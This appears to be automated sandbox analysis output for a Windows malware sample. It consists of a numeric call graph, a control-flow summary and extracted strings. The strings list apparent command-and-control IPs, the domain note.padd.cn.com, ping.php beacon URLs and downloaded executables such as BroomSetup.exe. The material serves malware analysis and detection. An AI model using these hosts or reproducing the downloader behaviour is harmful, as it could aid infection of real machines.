45215->45213 45730 403ae1 27 API calls 45216->45730 45219 427157 SetThreadLocale 45220 42716f 45219->45220 45221 401aa1 27 API calls 45220->45221 45221->45187 45223 4274aa recv 45223->45213 45223->45224 45224->45210 45224->45213 45224->45215 45224->45223 45225 4274d5 recv 45224->45225 45732 41196d 42 API calls std::_Locinfo::_Locinfo_dtor 45224->45732 45733 42611d 22 API calls 45224->45733 45225->45213 45225->45224 45739 4275a4 45226->45739 45228 426139 RegCreateKeyExA 45229 4261f7 45228->45229 45230 42616c 45228->45230 45231 426206 45229->45231 45232 4261fd RegCloseKey 45229->45232 45233 402c71 27 API calls 45230->45233 45231->45037 45232->45231 45234 426195 45233->45234 45235 402c71 27 API calls 45234->45235 45236 4261be RegSetValueExA 45235->45236 45237 402bef 26 API calls 45236->45237 45238 4261ef 45237->45238 45239 402bef 26 API calls 45238->45239 45239->45229 45241 403579 __EH_prolog 45240->45241 45242 401056 50 API calls 45241->45242 45243 40359c 45242->45243 45244 401056 50 API calls 45243->45244 45245 4035c8 45244->45245 45246 40399f 27 API calls 45245->45246 45247 4035d9 45246->45247 45247->45041 45249 410cb2 45248->45249 45250 410c9d 45248->45250 45742 41097b 51 API calls 4 library calls 45249->45742 45740 412381 20 API calls __Strcoll 45250->45740 45253 410ca2 45741 410905 26 API calls _Deallocate 45253->45741 45254 410cad 45254->45052 45257 42588e 45256->45257 45258 42623e WriteFile FindCloseChangeNotification 45256->45258 45257->45056 45257->45060 45258->45257 45260 426271 45259->45260 45260->45260 45261 426279 ShellExecuteExA 45260->45261 45262 4262c5 45261->45262 45263 4262ae WaitForSingleObject CloseHandle 45261->45263 45264 402bef 26 API calls 45262->45264 45263->45262 45265 4262cd 45264->45265 45265->45060 45267 425b8e 45266->45267 45267->45065 45271 402c5a 45270->45271 45271->45271 45274 402c71 45271->45274 45273 401b3a 45273->45015 45275 402ca4 45274->45275 45277 402c80 BuildCatchObjectHelperInternal 45274->45277 45278 40373e 27 API calls 2 library calls 45275->45278 45277->45273 45278->45277 45279->45111 45281 402d2a 45280->45281 45283 402d31 ctype 45281->45283 45284 403859 45281->45284 45283->45116 45285 403866 45284->45285 45286 40386f 45284->45286 45291 4039ce 45285->45291 45287 40387b 45286->45287 45300 409256 45286->45300 45287->45283 45290 40386c 45290->45283 45292 409256 std::_Facet_Register 8 API calls 45291->45292 45293 4039e5 45292->45293 45294 4039f7 45293->45294 45295 4039ec 45293->45295 45307 41088a 26 API calls 4 library calls 45294->45307 45295->45290 45297 410924 45308 410932 11 API calls _abort 45297->45308 45299 410931 45302 40925b ___std_exception_copy 45300->45302 45301 409275 45301->45290 45302->45301 45304 409277 std::_Facet_Register 45302->45304 45309 412ede 7 API calls 2 library calls 45302->45309 45310 40aa2b RaiseException 45304->45310 45306 40996c 45307->45297 45308->45299 45309->45302 45310->45306 45312 403e16 __EH_prolog 45311->45312 45343 407d73 45312->45343 45314 403e38 45353 404189 45314->45353 45320 403e7f 45391 4044e5 45320->45391 45322 403e8b 45412 4043fe 45322->45412 45326 4040a1 __EH_prolog 45325->45326 45332 4040b2 45326->45332 45489 40429b 27 API calls __EH_prolog 45326->45489 45328 4040d9 45490 404777 27 API calls 45328->45490 45330 404152 45494 404238 26 API calls _Deallocate 45330->45494 45332->45124 45332->45128 45332->45129 45334 404144 45493 404777 27 API calls 45334->45493 45335 4040e9 45335->45330 45335->45334 45491 404777 27 API calls 45335->45491 45492 404579 26 API calls 45335->45492 45339 402c03 45338->45339 45340 402bfa 45338->45340 45339->45134 45495 40387f 26 API calls 2 library calls 45340->45495 45342->45127 45344 407d7f __EH_prolog3 45343->45344 45416 407b1c 45344->45416 45347 407da5 _Yarn 45422 407b74 45347->45422 45350 407d9d 45430 407f02 40 API calls _Atexit 45350->45430 45352 407dfb std::locale::_Init 45352->45314 45354 404193 __EH_prolog 45353->45354 45355 407b1c std::_Lockit::_Lockit 2 API calls 45354->45355 45356 4041a2 45355->45356 45435 401318 45356->45435 45358 4041cc 45360 407b74 std::_Lockit::~_Lockit 2 API calls 45358->45360 45359 4041b9 std::locale::_Getfacet 45359->45358 45441 40436e 45359->45441 45361 403e49 45360->45361 45369 4033ea 45361->45369 45364 4041e3 45455 407d41 8 API calls std::_Facet_Register 45364->45455 45365 404219 45456 40aa2b RaiseException 45365->45456 45368 40422f 45370 4033f4 __EH_prolog 45369->45370 45371 407b1c std::_Lockit::_Lockit 2 API calls 45370->45371 45372 403403 45371->45372 45373 401318 int 4 API calls 45372->45373 45375 40341a std::locale::_Getfacet 45373->45375 45374 40342d 45376 407b74 std::_Lockit::~_Lockit 2 API calls 45374->45376 45375->45374 45468 401429 76 API calls 2 library calls 45375->45468 45377 40346a 45376->45377 45385 404424 45377->45385 45379 40343d 45380 403444 45379->45380 45381 40347a 45379->45381 45469 407d41 8 API calls std::_Facet_Register 45380->45469 45470 40aa2b RaiseException 45381->45470 45384 403490 45386 40442e __EH_prolog 45385->45386 45471 404d6b 45386->45471 45388 404463 45389 409256 std::_Facet_Register 8 API calls 45388->45389 45390 40447e 45389->45390 45390->45320 45392 4044ef __EH_prolog 45391->45392 45483 405177 8 API calls std::_Facet_Register 45392->45483 45394 40450d 45484 405025 29 API calls std::_Facet_Register 45394->45484 45396 404517 45397 404571 45396->45397 45398 40451e 45396->45398 45487 404efe 27 API calls 45397->45487 45485 405119 8 API calls std::_Facet_Register 45398->45485 45401 404528 45486 405e85 8 API calls std::_Facet_Register 45401->45486 45404 404531 45404->45322 45413 403eb8 45412->45413 45414 404406 45412->45414 45413->45120 45488 40387f 26 API calls 2 library calls 45414->45488 45417 407b32 45416->45417 45418 407b2b 45416->45418 45420 407b30 45417->45420 45432 408745 EnterCriticalSection 45417->45432 45431 411a65 EnterCriticalSection std::_Lockit::_Lockit 45418->45431 45420->45347 45429 407edf 8 API calls 2 library calls 45420->45429 45423 407b7e 45422->45423 45424 411a6e 45422->45424 45426 407b91 45423->45426 45433 408753 LeaveCriticalSection 45423->45433 45434 411a4e LeaveCriticalSection 45424->45434 45426->45352 45427 411a75 45427->45352 45429->45350 45430->45347 45431->45420 45432->45420 45433->45426 45434->45427 45436 401324 45435->45436 45437 401348 45435->45437 45438 407b1c std::_Lockit::_Lockit 2 API calls 45436->45438 45437->45359 45439 40132e 45438->45439 45440 407b74 std::_Lockit::~_Lockit 2 API calls 45439->45440 45440->45437 45442 404378 __EH_prolog 45441->45442 45443 4041dc 45442->45443 45444 409256 std::_Facet_Register 8 API calls 45442->45444 45443->45364 45443->45365 45445 404395 45444->45445 45457 403a42 45445->45457 45449 4043c6 45466 40866c 38 API calls 3 library calls 45449->45466 45451 4043d4 45467 401239 74 API calls 2 library calls 45451->45467 45453 4043e4 45454 402bef 26 API calls 45453->45454 45454->45443 45455->45358 45456->45368 45458 403a4c __EH_prolog 45457->45458 45459 403a5d 45458->45459 45460 402c71 27 API calls 45458->45460 45461 403ac1 45459->45461 45463 402bef 26 API calls 45459->45463 45460->45459 45462 403ace 45461->45462 45464 402bef 26 API calls 45461->45464 45465 4011b0 76 API calls 7 library calls 45462->45465 45463->45461 45464->45462 45465->45449 45466->45451 45467->45453 45468->45379 45469->45374 45470->45384 45474 404eb6 45471->45474 45473 404d85 45473->45388 45473->45473 45475 404ed2 45474->45475 45480 404ece 45474->45480 45476 404ef8 45475->45476 45477 404eda 45475->45477 45482 4030f6 27 API calls 45476->45482 45478 403859 27 API calls 45477->45478 45478->45480 45480->45473 45483->45394 45484->45396 45485->45401 45486->45404 45488->45413 45489->45328 45490->45335 45491->45335 45492->45335 45493->45330 45495->45339 45497 401bbc __EH_prolog 45496->45497 45537 40307c 45497->45537 45503 401c1f 45504 401c51 45503->45504 45555 40187f 42 API calls 2 library calls 45503->45555 45506 402403 45504->45506 45507 40240d __EH_prolog 45506->45507 45573 402b06 45507->45573 45510 402441 45510->45143 45510->45144 45619 402baa 45512->45619 45514 401a30 ___scrt_fastfail 45514->45147 45516 4024ab __EH_prolog 45515->45516 45517 4024e4 45516->45517 45628 40187f 42 API calls 2 library calls 45516->45628 45518 402b06 42 API calls 45517->45518 45520 4024ee 45518->45520 45521 402551 45520->45521 45524 401d87 65 API calls 45520->45524 45525 40257c 45521->45525 45522 402511 45522->45521 45629 40187f 42 API calls 2 library calls 45522->45629 45524->45522 45526 402586 __EH_prolog 45525->45526 45527 402b06 42 API calls 45526->45527 45528 4025a8 45527->45528 45531 4025d8 45528->45531 45630 401f2b 45528->45630 45529 40265a 45536 402b87 26 API calls _Deallocate 45529->45536 45531->45529 45634 40187f 42 API calls 2 library calls 45531->45634 45672 4023b6 45533->45672 45535 401b95 45535->45150 45536->45154 45538 403086 __EH_prolog 45537->45538 45556 403175 45538->45556 45541 402fe5 45542 402fef __EH_prolog 45541->45542 45543 409256 std::_Facet_Register 8 API calls 45542->45543 45544 403005 45543->45544 45545 407d73 std::locale::_Init 43 API calls 45544->45545 45546 403013 45545->45546 45567 402e7b 45546->45567 45549 402f6b 45551 402f75 __EH_prolog 45549->45551 45550 402fbf std::ios_base::_Ios_base_dtor 45550->45503 45551->45550 45552 402e7b 26 API calls 45551->45552 45553 402f9d 45552->45553 45572 4035f5 76 API calls 7 library calls 45553->45572 45555->45504 45557 40317f __EH_prolog 45556->45557 45558 409256 std::_Facet_Register 8 API calls 45557->45558 45559 4031b9 45558->45559 45560 407d73 std::locale::_Init 43 API calls 45559->45560 45561 4031c6 45560->45561 45562 4033ea 76 API calls 45561->45562 45563 4031f5 std::ios_base::_Ios_base_dtor 45562->45563 45564 401bec 45563->45564 45566 40187f 42 API calls 2 library calls 45563->45566 45564->45541 45566->45564 45568 402ed9 45567->45568 45570 401c0f 45567->45570 45571 40e7d7 26 API calls 2 library calls 45568->45571 45570->45549 45571->45570 45572->45550 45574 402b10 __EH_prolog 45573->45574 45585 403101 45574->45585 45577 401d87 45578 401d99 45577->45578 45584 401df4 45578->45584 45593 402dfd 45578->45593 45581 401de1 45581->45584 45602 40fd67 45581->45602 45584->45510 45587 40310b __EH_prolog 45585->45587 45586 403128 45590 40241d 45586->45590 45592 40187f 42 API calls 2 library calls 45586->45592 45587->45586 45591 403242 42 API calls __EH_prolog 45587->45591 45590->45510 45590->45577 45591->45586 45592->45590 45594 402e0d 45593->45594 45596 401dc4 45593->45596 45594->45596 45613 4022ae 65 API calls 45594->45613 45596->45581 45596->45584 45599 4106d4 45596->45599 45597 402e1a 45597->45596 45614 40ea7d 65 API calls 2 library calls 45597->45614 45600 41049b _Xfiopen 64 API calls 45599->45600 45601 4106ea 45600->45601 45601->45581 45603 40fd72 45602->45603 45604 40fd87 45602->45604 45615 412381 20 API calls __Strcoll 45603->45615 45605 40fd9f 45604->45605 45617 412381 20 API calls __Strcoll 45604->45617 45605->45584 45608 40fd77 45616 410905 26 API calls _Deallocate 45608->45616 45609 40fd94 45618 410905 26 API calls _Deallocate 45609->45618 45611 40fd82 45611->45584 45613->45597 45614->45596 45615->45608 45616->45611 45617->45609 45618->45605 45620 402bc2 45619->45620 45621 402bc6 45619->45621 45620->45514 45622 402be9 45621->45622 45623 402bce 45621->45623 45627 4030f6 27 API calls 45622->45627 45625 403859 27 API calls 45623->45625 45625->45620 45628->45517 45629->45521 45631 401f3f 45630->45631 45632 401f52 ctype 45630->45632 45631->45531 45632->45631 45635 4102e9 45632->45635 45634->45529 45638 410306 45635->45638 45637 410301 45637->45631 45639 410312 ___BuildCatchObject 45638->45639 45640 410352 45639->45640 45641 410325 ___scrt_fastfail 45639->45641 45643 41034a __wsopen_s 45639->45643 45651 40e81d EnterCriticalSection 45640->45651 45665 412381 20 API calls __Strcoll 45641->45665 45643->45637 45644 41035c 45652 41011d 45644->45652 45647 41033f 45666 410905 26 API calls _Deallocate 45647->45666 45651->45644 45654 41012f ___scrt_fastfail 45652->45654 45658 41014c 45652->45658 45653 41013c 45668 412381 20 API calls __Strcoll 45653->45668 45654->45653 45654->45658 45660 41018f __fread_nolock 45654->45660 45656 410141 45669 410905 26 API calls _Deallocate 45656->45669 45667 410391 LeaveCriticalSection __fread_nolock 45658->45667 45659 4102ab ___scrt_fastfail 45671 412381 20 API calls __Strcoll 45659->45671 45660->45658 45660->45659 45662 4154e8 __fread_nolock 26 API calls 45660->45662 45664 4192ad __fread_nolock 38 API calls 45660->45664 45670 410399 26 API calls 4 library calls 45660->45670 45662->45660 45664->45660 45665->45647 45666->45643 45667->45643 45668->45656 45669->45658 45670->45660 45671->45656 45673 4023dd 45672->45673 45674 4023ef 45673->45674 45676 402f2f 45673->45676 45674->45535 45677 402f39 45676->45677 45678 402f3d 45676->45678 45681 402e7b 26 API calls 45677->45681 45679 402dfd 65 API calls 45678->45679 45680 402f42 45679->45680 45682 40e228 _Xfiopen 67 API calls 45680->45682 45683 402f66 45681->45683 45682->45677 45683->45674 45685 40106d ___scrt_initialize_default_local_stdio_options 45684->45685 45692 40fd43 45685->45692 45689 4039c7 45688->45689 45690 4039bb 45688->45690 45689->45163 45691 402c71 27 API calls 45690->45691 45691->45689 45695 40ead5 45692->45695 45696 40eb15 45695->45696 45697 40eafd 45695->45697 45696->45697 45698 40eb1d 45696->45698 45719 412381 20 API calls __Strcoll 45697->45719 45721 40e3f2 38 API calls 2 library calls 45698->45721 45701 40eb02 45720 410905 26 API calls _Deallocate 45701->45720 45702 40eb2d 45722 40eef9 20 API calls __Strcoll 45702->45722 45704 40eb0d 45712 4097a5 45704->45712 45707 40eba5 45723 40f0ad 50 API calls 3 library calls 45707->45723 45708 40107b 45708->45159 45711 40ebb0 45724 40ef2e 20 API calls _free 45711->45724 45713 4097b0 IsProcessorFeaturePresent 45712->45713 45714 4097ae 45712->45714 45716 409efa 45713->45716 45714->45708 45725 409ebe SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45716->45725 45718 409fdd 45718->45708 45719->45701 45720->45704 45721->45702 45722->45707 45723->45711 45724->45704 45725->45718 45727 401aab 45726->45727 45727->45727 45734 402cba 45727->45734 45729 401abd 45729->45169 45730->45219 45731->45208 45732->45224 45733->45224 45735 402cfa 45734->45735 45737 402cd0 BuildCatchObjectHelperInternal 45734->45737 45738 4037a9 27 API calls 2 library calls 45735->45738 45737->45729 45738->45737 45739->45228 45740->45253 45741->45254 45742->45254 45744 4138da _abort 45743->45744 45745 4138e1 45744->45745 45746 4138f3 45744->45746 45779 413a28 GetModuleHandleW 45745->45779 45767 411a06 EnterCriticalSection 45746->45767 45749 4138e6 45749->45746 45780 413a6c GetModuleHandleExW 45749->45780 45750 413998 45768 4139d8 45750->45768 45755 41396f 45756 413987 45755->45756 45789 41381a 5 API calls CatchGuardHandler 45755->45789 45790 41381a 5 API calls CatchGuardHandler 45756->45790 45757 4138fa 45757->45750 45757->45755 45788 4151ba 20 API calls _abort 45757->45788 45758 4139e1 45791 424699 5 API calls CatchGuardHandler 45758->45791 45759 4139b5 45771 4139e7 45759->45771 45767->45757 45792 411a4e LeaveCriticalSection 45768->45792 45770 4139b1 45770->45758 45770->45759 45793 4177fa 45771->45793 45774 413a15 45777 413a6c _abort 8 API calls 45774->45777 45775 4139f5 GetPEB 45775->45774 45776 413a05 GetCurrentProcess TerminateProcess 45775->45776 45776->45774 45778 413a1d ExitProcess 45777->45778 45779->45749 45781 413a96 GetProcAddress 45780->45781 45782 413ab9 45780->45782 45785 413aab 45781->45785 45783 413ac8 45782->45783 45784 413abf FreeLibrary 45782->45784 45786 4097a5 CatchGuardHandler 5 API calls 45783->45786 45784->45783 45785->45782 45787 4138f2 45786->45787 45787->45746 45788->45755 45789->45756 45790->45750 45792->45770 45794 41781f 45793->45794 45795 417815 45793->45795 45800 4171b7 5 API calls 2 library calls 45794->45800 45797 4097a5 CatchGuardHandler 5 API calls 45795->45797 45798 4139f1 45797->45798 45798->45774 45798->45775 45799 417836 45799->45795 45800->45799 45801 41aff9 45806 41adc7 45801->45806 45804 41b021 45811 41adf2 45806->45811 45808 41afe5 45825 410905 26 API calls _Deallocate 45808->45825 45810 41af44 45810->45804 45818 41a34b 45810->45818 45811->45811 45814 41af3b 45811->45814 45821 422ce9 46 API calls 2 library calls 45811->45821 45813 41af85 45813->45814 45822 422ce9 46 API calls 2 library calls 45813->45822 45814->45810 45824 412381 20 API calls __Strcoll 45814->45824 45816 41afa4 45816->45814 45823 422ce9 46 API calls 2 library calls 45816->45823 45826 419d20 45818->45826 45820 41a366 45820->45804 45821->45813 45822->45816 45823->45814 45824->45808 45825->45810 45828 419d2c ___BuildCatchObject 45826->45828 45827 419d3a 45844 412381 20 API calls __Strcoll 45827->45844 45828->45827 45830 419d73 45828->45830 45837 41a2fa 45830->45837 45831 419d3f 45845 410905 26 API calls _Deallocate 45831->45845 45836 419d49 __wsopen_s 45836->45820 45847 4228d8 45837->45847 45840 419d97 45846 419dc0 LeaveCriticalSection __wsopen_s 45840->45846 45843 41629a _free 20 API calls 45843->45840 45844->45831 45845->45836 45846->45836 45848 4228e4 45847->45848 45849 4228fb 45847->45849 45918 412381 20 API calls __Strcoll 45848->45918 45851 422903 45849->45851 45852 42291a 45849->45852 45920 412381 20 API calls __Strcoll 45851->45920 45922 4172ce 10 API calls 2 library calls 45852->45922 45854 4228e9 45919 410905 26 API calls _Deallocate 45854->45919 45856 422921 MultiByteToWideChar 45860 422950 45856->45860 45861 422940 GetLastError 45856->45861 45858 422908 45921 410905 26 API calls _Deallocate 45858->45921 45863 417a45 std::_Locinfo::_Locinfo_dtor 21 API calls 45860->45863 45923 41234b 20 API calls 3 library calls 45861->45923 45865 422958 45863->45865 45864 41a310 45864->45840 45871 41a36b 45864->45871 45866 422980 45865->45866 45867 42295f MultiByteToWideChar 45865->45867 45868 41629a _free 20 API calls 45866->45868 45867->45866 45869 422974 GetLastError 45867->45869 45868->45864 45924 41234b 20 API calls 3 library calls 45869->45924 45925 41a0ce 45871->45925 45874 41a3b6 45943 41e7d7 45874->45943 45875 41a39d 45957 41236e 20 API calls __Strcoll 45875->45957 45878 41a3bb 45879 41a3c4 45878->45879 45880 41a3db 45878->45880 45959 41236e 20 API calls __Strcoll 45879->45959 45956 41a039 CreateFileW 45880->45956 45884 41a338 45884->45843 45885 41a3c9 45960 412381 20 API calls __Strcoll 45885->45960 45887 41a491 GetFileType 45890 41a4e3 45887->45890 45891 41a49c GetLastError 45887->45891 45888 41a3a2 45958 412381 20 API calls __Strcoll 45888->45958 45889 41a466 GetLastError 45962 41234b 20 API calls 3 library calls 45889->45962 45965 41e720 21 API calls 3 library calls 45890->45965 45963 41234b 20 API calls 3 library calls 45891->45963 45892 41a414 45892->45887 45892->45889 45961 41a039 CreateFileW 45892->45961 45895 41a4aa CloseHandle 45895->45888 45897 41a4d3 45895->45897 45964 412381 20 API calls __Strcoll 45897->45964 45899 41a459 45899->45887 45899->45889 45901 41a504 45903 41a550 45901->45903 45966 41a24a 72 API calls 4 library calls 45901->45966 45902 41a4d8 45902->45888 45907 41a57d 45903->45907 45967 419dec 72 API calls 5 library calls 45903->45967 45906 41a576 45906->45907 45908 41a58e 45906->45908 45909 4163fd __wsopen_s 29 API calls 45907->45909 45908->45884 45910 41a60c CloseHandle 45908->45910 45909->45884 45968 41a039 CreateFileW 45910->45968 45912 41a637 45913 41a641 GetLastError 45912->45913 45914 41a66d 45912->45914 45969 41234b 20 API calls 3 library calls 45913->45969 45914->45884 45916 41a64d 45970 41e8e9 21 API calls 3 library calls 45916->45970 45918->45854 45919->45864 45920->45858 45921->45864 45922->45856 45923->45864 45924->45866 45926 41a109 45925->45926 45927 41a0ef 45925->45927 45971 41a05e 45926->45971 45927->45926 45978 412381 20 API calls __Strcoll 45927->45978 45930 41a0fe 45979 410905 26 API calls _Deallocate 45930->45979 45932 41a141 45933 41a170 45932->45933 45980 412381 20 API calls __Strcoll 45932->45980 45940 41a1c3 45933->45940 45982 413b67 26 API calls 2 library calls 45933->45982 45936 41a1be 45938 41a23d 45936->45938 45936->45940 45937 41a165 45981 410905 26 API calls _Deallocate 45937->45981 45983 410932 11 API calls _abort 45938->45983 45940->45874 45940->45875 45942 41a249 45944 41e7e3 ___BuildCatchObject 45943->45944 45986 411a06 EnterCriticalSection 45944->45986 45946 41e7ea 45947 41e80f 45946->45947 45950 41e87d EnterCriticalSection 45946->45950 45953 41e831 45946->45953 45990 41e5b6 21 API calls 2 library calls 45947->45990 45950->45953 45954 41e88a LeaveCriticalSection 45950->45954 45951 41e814 45951->45953 45991 41e6fd EnterCriticalSection 45951->45991 45952 41e85a __wsopen_s 45952->45878 45987 41e8e0 45953->45987 45954->45946 45956->45892 45957->45888 45958->45884 45959->45885 45960->45888 45961->45899 45962->45888 45963->45895 45964->45902 45965->45901 45966->45903 45967->45906 45968->45912 45969->45916 45970->45914 45973 41a076 45971->45973 45972 41a091 45972->45932 45973->45972 45984 412381 20 API calls __Strcoll 45973->45984 45975 41a0b5 45985 410905 26 API calls _Deallocate 45975->45985 45977 41a0c0 45977->45932 45978->45930 45979->45926 45980->45937 45981->45933 45982->45936 45983->45942 45984->45975 45985->45977 45986->45946 45992 411a4e LeaveCriticalSection 45987->45992 45989 41e8e7 45989->45952 45990->45951 45991->45953 45992->45989 45993 432003c 45994 4320049 45993->45994 46008 4320e0f SetErrorMode SetErrorMode 45994->46008 45999 4320265 46000 43202ce VirtualProtect 45999->46000 46002 432030b 46000->46002 46001 4320439 VirtualFree 46006 43205f4 LoadLibraryA 46001->46006 46007 43204be 46001->46007 46002->46001 46003 43204e3 LoadLibraryA 46003->46007 46005 43208c7 46006->46005 46007->46003 46007->46006 46009 4320223 46008->46009 46010 4320d90 46009->46010 46011 4320dad 46010->46011 46012 4320dbb GetPEB 46011->46012 46013 4320238 VirtualAlloc 46011->46013 46012->46013 46013->45999 46014 41870f 46015 41871b ___BuildCatchObject 46014->46015 46016 418727 46015->46016 46017 41873e 46015->46017 46048 412381 20 API calls __Strcoll 46016->46048 46027 40e81d EnterCriticalSection 46017->46027 46020 41872c 46049 410905 26 API calls _Deallocate 46020->46049 46021 41874e 46028 41878b 46021->46028 46024 41875a 46050 418781 LeaveCriticalSection __fread_nolock 46024->46050 46026 418737 __wsopen_s 46027->46021 46029 4187b3 46028->46029 46030 418799 46028->46030 46031 4154e8 __fread_nolock 26 API calls 46029->46031 46054 412381 20 API calls __Strcoll 46030->46054 46033 4187bc 46031->46033 46051 4197e5 46033->46051 46034 41879e 46055 410905 26 API calls _Deallocate 46034->46055 46038 4188c0 46040 4188cd 46038->46040 46043 418873 46038->46043 46039 418844 46042 418861 46039->46042 46039->46043 46057 412381 20 API calls __Strcoll 46040->46057 46056 418aa4 31 API calls 4 library calls 46042->46056 46045 4187a9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 46043->46045 46058 418920 30 API calls 2 library calls 46043->46058 46045->46024 46046 41886b 46046->46045 46048->46020 46049->46026 46050->46026 46059 419662 46051->46059 46053 4187d8 46053->46038 46053->46039 46053->46045 46054->46034 46055->46045 46056->46046 46057->46045 46058->46045 46060 41966e ___BuildCatchObject 46059->46060 46061 419676 46060->46061 46062 41968e 46060->46062 46085 41236e 20 API calls __Strcoll 46061->46085 46063 419742 46062->46063 46068 4196c6 46062->46068 46090 41236e 20 API calls __Strcoll 46063->46090 46066 41967b 46086 412381 20 API calls __Strcoll 46066->46086 46067 419747 46091 412381 20 API calls __Strcoll 46067->46091 46084 41e6fd EnterCriticalSection 46068->46084 46072 41974f 46092 410905 26 API calls _Deallocate 46072->46092 46073 4196cc 46075 4196f0 46073->46075 46076 419705 46073->46076 46087 412381 20 API calls __Strcoll 46075->46087 46079 419767 __fread_nolock 28 API calls 46076->46079 46078 419683 __wsopen_s 46078->46053 46081 419700 46079->46081 46080 4196f5 46088 41236e 20 API calls __Strcoll 46080->46088 46089 41973a LeaveCriticalSection __wsopen_s 46081->46089 46084->46073 46085->46066 46086->46078 46087->46080 46088->46081 46089->46078 46090->46067 46091->46072 46092->46078

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 0 424b3e-424eb5 call 40a0c0 call 403491 call 40197c call 401b1e call 401a8d call 401a72 call 401a8d call 403498 call 401b52 call 401b1e call 426354 call 401b1e GetModuleFileNameA call 401b1e call 425ee2 call 401a0c call 403491 * 3 call 40197c call 403491 * 3 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 403491 * 4 call 40197c call 403491 * 3 call 40197c call 403491 * 5 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 403491 * 3 call 40197c 129 424f07-425842 call 403491 * 35 call 40197c call 401b1e call 401a67 * 2 call 4034e3 call 401ae8 call 403491 * 14 call 40197c call 401b41 * 2 call 401adf call 401a67 call 401adf call 426504 call 40ff7e call 403491 * 21 call 40197c call 403491 * 9 call 40197c call 403491 call 40197c call 42612f call 403491 * 15 call 40197c call 403491 * 19 call 40197c call 401b1e call 401a67 call 40356f call 401ae8 call 401b41 * 2 call 401adf call 401a67 call 401adf call 426504 call 40ff7e call 403491 * 14 call 40197c call 403491 * 12 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 0->129 130 424eb7 0->130 499 425e40-425eb7 call 4019f8 * 2 call 401ae8 call 4019f8 call 401ae8 call 401a11 call 401ae8 * 4 129->499 500 425848-425893 call 40b5a0 call 410c91 call 4262d2 call 426217 129->500 132 424ef2-424ef7 130->132 133 424ec1-424ec6 130->133 134 424ed6-424edb 130->134 135 424ee4-424ee9 130->135 136 424eeb-424ef0 130->136 137 424ec8-424ecd 130->137 138 424ef9 130->138 139 424ebe-424ebf 130->139 140 424ecf-424ed4 130->140 141 424edd-424ee2 130->141 142 424efe-424f02 call 401adf 132->142 133->142 134->142 135->142 136->142 137->142 138->142 139->142 140->142 141->142 142->129 517 425895-4258a7 call 401b1e call 426260 500->517 518 4258af-425ac6 call 40ff7e call 403491 * 16 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 500->518 529 4258ac 517->529 613 425bcf-425db7 call 403491 * 15 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 518->613 614 425acc-425ba6 call 40b5a0 call 403491 * 12 call 40197c call 42631a call 426217 518->614 529->518 729 425e2b-425e3b call 4019f8 * 2 613->729 730 425db9-425e02 call 40b5a0 call 410c91 call 4262d2 call 426217 613->730 679 425bc2-425bc9 call 40ff7e 614->679 680 425ba8-425bba call 401b1e call 426260 614->680 687 425bce 679->687 691 425bbf 680->691 687->613 691->679 729->499 742 425e04-425e16 call 401b1e call 426260 730->742 743 425e1e-425e25 call 40ff7e 730->743 749 425e1b 742->749 747 425e2a 743->747 747->729 749->743
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00426354: __EH_prolog.LIBCMT ref: 00426359
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043CEE4), ref: 00424C05
                                                                                                                                                                                                                                                • Part of subcall function 00425EE2: __EH_prolog.LIBCMT ref: 00425EE7
                                                                                                                                                                                                                                                • Part of subcall function 00425EE2: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                                                                                                              • String ID: /1/Qg_Appv5.exe$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$Qg_Appv5.exe$SOFTWARE\BroomCleaner$eight$five$four$nine$note.padd.cn.com$one$seven$six$sub=([\w-]{1,255})$ten$three$two
                                                                                                                                                                                                                                              • API String ID: 2531350358-4166474000
                                                                                                                                                                                                                                              • Opcode ID: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
                                                                                                                                                                                                                                              • Instruction ID: b94a07167da01af8c51153bc4f1e8c174558d31be475b6648fa5fcd106bc986c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3A2211050A2E19AC712FB75589758A2FE51B6630DF54A87FE5D03F2A3C97C820C87AF
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
